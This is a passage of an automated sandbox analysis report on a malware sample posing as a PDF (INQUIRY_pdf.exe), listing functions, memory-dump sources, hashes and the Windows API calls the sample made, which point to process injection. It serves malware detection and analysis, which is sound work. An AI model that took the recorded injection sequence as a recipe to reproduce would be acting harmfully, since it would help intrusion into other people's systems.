
Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID: QQ
API String ID: 1726664587-127192606
Opcode ID: 3906331e625d94839a40813e44ac17f13bef49438452a2d57358518e94852ed1
Instruction ID: dbb7a4118c31c61382ddeb75ad5ac83d543a864924c4e581f5615f2e1b6ddfc6
Opcode Fuzzy Hash: 3906331e625d94839a40813e44ac17f13bef49438452a2d57358518e94852ed1
Instruction Fuzzy Hash: 4A2136B1D003599FDB10CFAAC881AEEFBF5FF48320F14842AE558A7240D7789940DBA1

Function 078AC6D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078AC756

Strings

QQ, xrefs: 078AC6F4

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID: QQ
API String ID: 983334009-127192606
Opcode ID: 13059ead4f6e8cca5c1d20e08b03f876d63057f3371d9ed1fd09862609b14168
Instruction ID: 8e93c0572cc7fff27810a533520387c3cb3ff96b479c3e84581c4b21fca879fd
Opcode Fuzzy Hash: 13059ead4f6e8cca5c1d20e08b03f876d63057f3371d9ed1fd09862609b14168
Instruction Fuzzy Hash: 6D2118B1D003099FDB10DFAAC5857AEBBF4EF98324F14842AD519A7340CB78A945CFA1

Function 078AC960 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078AC9E0

Strings

QQ, xrefs: 078AC97F

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID: QQ
API String ID: 1726664587-127192606
Opcode ID: d59b2780074b2f3240b5fb4850bc8e55357a02370a65e6773beff6397b841e08
Instruction ID: dd87057f9e1c0dcaf007a1e7965f66469b32de04bb1bd7416f42c051289ade17
Opcode Fuzzy Hash: d59b2780074b2f3240b5fb4850bc8e55357a02370a65e6773beff6397b841e08
Instruction Fuzzy Hash: A4213AB1D003599FDB10CFAAC881AEEFBF5FF48320F14842AE518A7240D7789540DBA1

Function 0110E5E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0110E667

Strings

QQ, xrefs: 0110E5FF

Memory Dump Source

Source File: 00000000.00000002.1702134385.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_INQUIRY_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID: QQ
API String ID: 3793708945-127192606
Opcode ID: 91d791be3d671b978eab3ce872c5e127040fbc9f000e26393cfd03d4fc890d3b
Instruction ID: 324efa461a752dd5b47e4a83c63306dcd6afb6a7df0134e0d1db8d99a4c54737
Opcode Fuzzy Hash: 91d791be3d671b978eab3ce872c5e127040fbc9f000e26393cfd03d4fc890d3b
Instruction Fuzzy Hash: 9721B3B5D012499FDB10CFAAD984ADEBBF9EB48320F14841AE918A7350D374A944CF65

Function 078AC7AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078AC81E

Strings

QQ, xrefs: 078AC7C7

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID: QQ
API String ID: 4275171209-127192606
Opcode ID: a7eb86567d075f2749fb81d414961467542734d28f63334c29d4f9209fc5a769
Instruction ID: 18fded1438369edf4b88a1aab4c33f9669b8d7156d6fe733e7d4de20e75af49e
Opcode Fuzzy Hash: a7eb86567d075f2749fb81d414961467542734d28f63334c29d4f9209fc5a769
Instruction Fuzzy Hash: 712167B1800249DFDB10CFAAC845ADEFFF5EF88320F208819E559A7250C775A540DFA1

Function 078AC7B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078AC81E

Strings

QQ, xrefs: 078AC7C7

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID: QQ
API String ID: 4275171209-127192606
Opcode ID: 85227fb18a635a716afb7cdef74a7cf34f7ed22d95ef76d300c211f96969cb6f
Instruction ID: 656e44346069818119ac56ec77fd9a5c276e799ba86be8b72555a514c3aeb19b
Opcode Fuzzy Hash: 85227fb18a635a716afb7cdef74a7cf34f7ed22d95ef76d300c211f96969cb6f
Instruction Fuzzy Hash: 791137B19002499FDB10DFAAC845ADEBFF5EF98320F248419E519A7250C775A540DFA1

Function 078AC1E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 078AC252

Strings

QQ, xrefs: 078AC207

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: ResumeThread
String ID: QQ
API String ID: 947044025-127192606
Opcode ID: 45752bf08470d70f9edabfeca5045463d5e06f71cc41e865df6f454b403fabfa
Instruction ID: 3a7a2e89d2119b5ea9edc85214c9c134b0527e79871f0055941e6f83c5ff9dc2
Opcode Fuzzy Hash: 45752bf08470d70f9edabfeca5045463d5e06f71cc41e865df6f454b403fabfa
Instruction Fuzzy Hash: AF1149B1D003498FDB20DFAAC44579EFBF5EF88320F20841AD519A7240CB75A544CBA5

Function 078AC1F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 078AC252

Strings

QQ, xrefs: 078AC207

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: ResumeThread
String ID: QQ
API String ID: 947044025-127192606
Opcode ID: 8738f3eb8c310c88f0bf96c5202cada4f4cff3e384c8f67c1bc179dae48bf371
Instruction ID: ced0b74ffb3a0a6a515ad77a9a49c30188c59029dcb117bb917a19524cbbbf44
Opcode Fuzzy Hash: 8738f3eb8c310c88f0bf96c5202cada4f4cff3e384c8f67c1bc179dae48bf371
Instruction Fuzzy Hash: 44110AB1D003498FDB20DFAAC44579EFBF5EF98324F248419D519A7340CB79A544CBA5

Function 078AF302 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 078AF365

Strings

QQ, xrefs: 078AF322

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MessagePost
String ID: QQ
API String ID: 410705778-127192606
Opcode ID: 8bae32fc0c6744220070b4d43e3f47410a1c2b4954599cb38e138804d7f0cff9
Instruction ID: 1423f80ee857ea1ac5ba88ba2bc62de1e7e9db5e6db5bd12140c69ae8118206e
Opcode Fuzzy Hash: 8bae32fc0c6744220070b4d43e3f47410a1c2b4954599cb38e138804d7f0cff9
Instruction Fuzzy Hash: AA11F5B5800249DFDB10CF9AC485BDEFBF8FB48324F20841AE958A3200D375A944CFA1

Function 0110C300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0110C366

Strings

QQ, xrefs: 0110C31F

Memory Dump Source

Source File: 00000000.00000002.1702134385.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_INQUIRY_pdf.jbxd

Similarity

API ID: HandleModule
String ID: QQ
API String ID: 4139908857-127192606
Opcode ID: 3fff39081ec1f7c68d01eaba5bb53bd03ef880031404e3ea94d4414493faec84
Instruction ID: 25b4c8be678b3853e8d6af26f1a490cedfb852ed800970fa60d97aef213dffb7
Opcode Fuzzy Hash: 3fff39081ec1f7c68d01eaba5bb53bd03ef880031404e3ea94d4414493faec84
Instruction Fuzzy Hash: FF110FB5C003498FDB24CF9AC444B9EFBF4AB88320F10855AD928B7240C3B9A645CFA1

Function 078A93D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 078AF365

Strings

QQ, xrefs: 078AF322

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MessagePost
String ID: QQ
API String ID: 410705778-127192606
Opcode ID: 27ad7e52674563546dab1032f0a5a86d0b1875371fc4ecd4d30116a7fcdab35f
Instruction ID: 1dbe32a00393b731b7e090965fbbf2ce488c6ce738a1c68f768ed7d803c1f8e4
Opcode Fuzzy Hash: 27ad7e52674563546dab1032f0a5a86d0b1875371fc4ecd4d30116a7fcdab35f
Instruction Fuzzy Hash: 3911C5B58003499FDB10DF99C585BDEFBF8EB58724F10845AE618A7640C375A944CFA1

Function 078AF398 Relevance: 1.6, APIs: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 078AF365

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f2c8a6b4e213000ea71b0c3d40b3ef8b403cb2a22272b8cc4e4b1bddf91770c6
Instruction ID: c7b3bccf754dea1a8e7815b534252eecf4634083d16094c9ce7ccbab19543107
Opcode Fuzzy Hash: f2c8a6b4e213000ea71b0c3d40b3ef8b403cb2a22272b8cc4e4b1bddf91770c6
Instruction Fuzzy Hash: 1821EFF2D0525A9FEB21CFA4D905BEEBBF0AF55304F14444AD640B7641C7399804CBA0

Function 00DAD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701221872.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e00a334ba1f0ae53ced30dae8605b463eafbf471c28620c0cbc4780ebd40fba
Instruction ID: 7646f6c3052ab921a2485dfa25a51c759c4355601f9429152e60aff98fe2c836
Opcode Fuzzy Hash: 2e00a334ba1f0ae53ced30dae8605b463eafbf471c28620c0cbc4780ebd40fba
Instruction Fuzzy Hash: 0F2145B1104200DFDB04DF04C9C0B26BF66FB98324F24C569E90A0B656C37AE846DBB2

Function 00DBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701266478.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be21b4d64df4d93c4a6d34ae97144c6d6824af5859e4dad40889a5e11beec8f3
Instruction ID: 688073953dc25af88766702af0d5a88f5568c41e9c864b874756df5ab26913c8
Opcode Fuzzy Hash: be21b4d64df4d93c4a6d34ae97144c6d6824af5859e4dad40889a5e11beec8f3
Instruction Fuzzy Hash: 8A21F2B5604200DFCB14EF14D9C0B66BB66FB88314F24C96DE94A4B296D73AD847CA71

Function 00DBD1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701266478.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab36b1497df1dc09e4369f803e861d1f317107d58333094de44d26397edc51de
Instruction ID: c698a8d10767b6bf6f8b5ce95fcf3dafc08e75024f709549ddf04609759fa379
Opcode Fuzzy Hash: ab36b1497df1dc09e4369f803e861d1f317107d58333094de44d26397edc51de
Instruction Fuzzy Hash: 0F2134B5504280EFCB04DF14C5C0B26BB66FB84324F24C96DE84A4B292D33AD806CAB5

Function 00DBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701266478.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8cc6fd6686c38c0eba91a66f8f41eef6aa596c844e8c77b52c263ab0aa3cfd
Instruction ID: 14b75f6e673a3713a6b39a23201e88f6d6b18de3ec91eb0882e9e0685bca33c7
Opcode Fuzzy Hash: bf8cc6fd6686c38c0eba91a66f8f41eef6aa596c844e8c77b52c263ab0aa3cfd
Instruction Fuzzy Hash: 51218075509380CFCB12DF24D990715BF72EB46314F28C5EAD8498B6A7C33AD80ACB62

Function 0AEC0F23 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712959060.000000000AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aec0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f25c94ecde5790f9355d2b019c64e42a138b2011bcce33d5f4fdf360a98570e
Instruction ID: f5470768c8e2e995c1cf67d190f5a1e1989b75d1b2797659ce5fa9125ed4dce2
Opcode Fuzzy Hash: 1f25c94ecde5790f9355d2b019c64e42a138b2011bcce33d5f4fdf360a98570e
Instruction Fuzzy Hash: EC1104325083C58FCB128B78C9148C9BF70EF43715B0841DBE5849B1A2EB3188AACB81

Function 00DAD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701221872.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 530da2b0c3f3e6b272883e526d3fa1e80ffa71e08f9cb46f1840ff016cdebbd7
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: AD112676404240CFDB12CF00D5C4B16BF72FB98324F28C6A9D80A0B656C33AE85ACBA1

Function 00DBD1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701266478.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: df036fea84954aa8192515b8519529ce6bc447413bc12d305d66c4a8c729a033
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 7411DD75504280DFDB01CF10D5C0B15BFA2FB84314F28C6AAD80A4B656C33AD84ACBA1

Function 00DAD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701221872.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc5ec6516c4a2cb12bd2714c6f93a0eccdee5b203f5e9badaa78e9ae169bff3
Instruction ID: 965694b53e10a602f36e4df913e24e5c202c8c7e1c6eb116fe70e2f0a6df28ba
Opcode Fuzzy Hash: 4bc5ec6516c4a2cb12bd2714c6f93a0eccdee5b203f5e9badaa78e9ae169bff3
Instruction Fuzzy Hash: 5801DB714043409EE7144A25DCC4B66FFE9DF52324F1CC81AED4B4A696C779DC40D6B1

Function 00DAD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701221872.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9e2b239231affb216e62bbe49c774f03a9fbf812ed83ed113d4308b3d21da2
Instruction ID: edf69eca60d2fd431981164468665bd2747bbd751c662d3f6b01fe5bda93bd9e
Opcode Fuzzy Hash: ae9e2b239231affb216e62bbe49c774f03a9fbf812ed83ed113d4308b3d21da2
Instruction Fuzzy Hash: F1F09671404344AEE7248A16DDC4B62FFE8EF51734F18C45AED0A4B686C379AC44CBB1

Non-executed Functions

Function 078AB9C8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

d+k{, xrefs: 078ABA23

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: d+k{
API String ID: 0-3771075729
Opcode ID: 240bcb02388d6d636fd08a5748dd5d25534682f22a65968936040bd0ac8c86c4
Instruction ID: 8743d501ee4ee2193f6013feb22ec092751e5ea7aca2b3a4719d097ecf1744ea
Opcode Fuzzy Hash: 240bcb02388d6d636fd08a5748dd5d25534682f22a65968936040bd0ac8c86c4
Instruction Fuzzy Hash: CBE10DB4E101599FDB14DFA9C580AAEFBB2FF89314F24C169D414AB356D730A942CFA0

Function 078AA728 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f2d55601d32ca7ca5cf19f0bf4b8dbd7cb10fb64da1240879e1109e35b1dbc
Instruction ID: c006210e13ee8a6c7d24063a25714c47a293ab8f6139556b5e05e8f1fc8a636a
Opcode Fuzzy Hash: 36f2d55601d32ca7ca5cf19f0bf4b8dbd7cb10fb64da1240879e1109e35b1dbc
Instruction Fuzzy Hash: BEE11BB4E101199FDB14DFA9C580AAEFBB2FF89304F24C169D414AB356D730A942CFA1

Function 078AC2A0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f372c9e800f5bc3119168d30ebe934f4ff597f5adbf07e1468f0623c3ea991
Instruction ID: 09fdb9b53978f4e77ee16491281c3186bcc2a2d6c36e29cbaeac905466c34bce
Opcode Fuzzy Hash: 55f372c9e800f5bc3119168d30ebe934f4ff597f5adbf07e1468f0623c3ea991
Instruction Fuzzy Hash: ACE1F8B4E141599FDB14DFA9C5809AEFBB2BF89304F24C169D814AB356D730A942CFA0

Function 078AA2F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3c4c0bbba7a5212fb3800db312228fc0ab1978658e222bb318c2860416d6e3
Instruction ID: 944d3f95c65b2c2f21dc515dde54880a3f25eff321c7d2a3b81767543ee915a3
Opcode Fuzzy Hash: 8b3c4c0bbba7a5212fb3800db312228fc0ab1978658e222bb318c2860416d6e3
Instruction Fuzzy Hash: F5E12AB4E101599FDB14DFA8C5809AEFBB2FF89304F24C169D814AB756D730A942CFA1

Function 078A9EB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5fcc59716c456d751f52c1508f8b8c86cd08b9144e1bcd1bbdcddd77eb9a8f
Instruction ID: 7ff9943d0d087cc36fd47d39d66d49fb74310aedc2c21ef00250cd375808131a
Opcode Fuzzy Hash: 4e5fcc59716c456d751f52c1508f8b8c86cd08b9144e1bcd1bbdcddd77eb9a8f
Instruction Fuzzy Hash: 5BE129B4E041199FDB14DFA8C5809AEFBB2FF89304F24C169D814AB356D731A942CFA1

Function 078A16E7 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82413e93a69f386349fae099484bd0d36969fc73f455c3244735e9e30e0609eb
Instruction ID: 3c5f87ab78233db022023672d87e90ea34a3707ec7277e0b2bd69446d28600dc
Opcode Fuzzy Hash: 82413e93a69f386349fae099484bd0d36969fc73f455c3244735e9e30e0609eb
Instruction Fuzzy Hash: 01D11431D2075ACACB11EBA4D990AA9F771FF95300F10CB9AE40977265EF706AC4CB91

Function 078A16F8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f5cd8ce9edfe6cc765f96874ff6cb2a7d9d08cf42f59dc7eba55451447634c
Instruction ID: 178acb1861f1a28ebb469fe584a4a6902475f794c5dceacd123f442cbd81107d
Opcode Fuzzy Hash: 38f5cd8ce9edfe6cc765f96874ff6cb2a7d9d08cf42f59dc7eba55451447634c
Instruction Fuzzy Hash: C9D10431D2075ACACB11EBA4D990AA9F771FF95300F10CB9AE40977265EF706AC4CB91

Function 078A8F41 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e241b4aa201e59d4a6d3225cd8a7c6d6ec7c46d1583b0757b4c7a1f9401bf6c2
Instruction ID: 60f03109457ae6056e10d69d82ab6e6edfe2de8ddd81bc29a49fdeaf8ecc4d24
Opcode Fuzzy Hash: e241b4aa201e59d4a6d3225cd8a7c6d6ec7c46d1583b0757b4c7a1f9401bf6c2
Instruction Fuzzy Hash: 435146B4E1920DDFEB04CFAAD8405EEBBF6ABAA314F049165E419E7211D7309941CF50

Function 078A9EA1 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dfdc006e649f7eaca86f3c91828b3f4cb0084df686f5d39f60b33152e6a4b5
Instruction ID: 47685570828e8c9f697e8a14f74f687d80482bc63f5dbe3cfb302ee1ec63532c
Opcode Fuzzy Hash: 32dfdc006e649f7eaca86f3c91828b3f4cb0084df686f5d39f60b33152e6a4b5
Instruction Fuzzy Hash: 06513CB0E042199FDB14CFA9C9805AEFBF6BF89304F24C169D418AB356D735A941CFA1

Function 078AA2EA Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710697710.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390f745b6010136041ed4883ff1b74a39636007a9e0ae07fa6583f17f8ef919b
Instruction ID: 2bdde8ed0e415309507934ea9bce79dafe720b3693a15e5263e0c21a30d3e2c3
Opcode Fuzzy Hash: 390f745b6010136041ed4883ff1b74a39636007a9e0ae07fa6583f17f8ef919b
Instruction Fuzzy Hash: B5510BB0E102198BDB14CFA9C5805AEFBF6BF89304F24C169D418A7755D7359942CFA1

Analysis Process: INQUIRY_pdf.exePID: 7648, Parent PID: 7448COMMON

Executed Functions

Function 01089DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'fq, xrefs: 01089E04
4'fq, xrefs: 0108AB13
(ofq, xrefs: 0108A518
4'fq, xrefs: 01089F0C

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: (ofq$4'fq$4'fq$4'fq
API String ID: 0-1260671024
Opcode ID: f02494f5c2c20fe84d445edc713c7f8aa5cca1bb56bc2e3fa61d2d355e58629c
Instruction ID: 3bc86e089f42d3289b906b8922f22ee8bba91f54b5c7118d981e1c1e3f16031d
Opcode Fuzzy Hash: f02494f5c2c20fe84d445edc713c7f8aa5cca1bb56bc2e3fa61d2d355e58629c
Instruction Fuzzy Hash: 66A2A130B04609CFCB15EFA8C584AAEBBF2FF88310F158596E485DB666D735E941CB60

Function 010829EC Relevance: 5.5, Strings: 4, Instructions: 536COMMON

Download Yara Rule

Strings

Xjq, xrefs: 01082AD8
Xjq, xrefs: 01082B57
Xjq, xrefs: 01082A9E
Xjq, xrefs: 01082BA4

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: Xjq$Xjq$Xjq$Xjq
API String ID: 0-2725347807
Opcode ID: 1404fd172516907442a41d620dacf4f8395a169a7dd98324cdd93937f4d04545
Instruction ID: 3e23e7d8eadb4ff95c51bf844a26c9bb1d2a4d1ee7098af30a491d094b03fa60
Opcode Fuzzy Hash: 1404fd172516907442a41d620dacf4f8395a169a7dd98324cdd93937f4d04545
Instruction Fuzzy Hash: C812F63190F7D48BC7679F38C49125ABFB1AF47224B2984EEC4C59F563C635884ACB92

Function 01086FC8 Relevance: 5.4, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

,jq, xrefs: 0108728A
(ofq, xrefs: 01087220
,jq, xrefs: 01087298
(ofq, xrefs: 01087212

Memory Dump Source

